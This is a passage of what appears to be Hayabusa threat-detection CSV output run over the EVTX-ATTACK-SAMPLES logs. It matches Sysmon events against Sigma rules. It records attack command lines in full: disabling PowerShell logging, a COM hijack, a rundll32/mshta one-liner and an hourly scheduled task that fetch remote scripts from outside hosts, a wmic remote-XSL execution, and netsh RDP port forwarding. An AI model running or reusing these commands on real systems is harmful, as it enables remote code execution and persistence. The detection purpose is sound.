2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: 
HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx 2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 
365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 
365ABB72-47BB-5CE3-0000-00108CAD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 
365ABB72-47BE-5CE3-0000-0010CF0C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: 
IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA 
Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious 
Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 
2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx 2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.862 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - 
Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 
| PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | 
Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port 
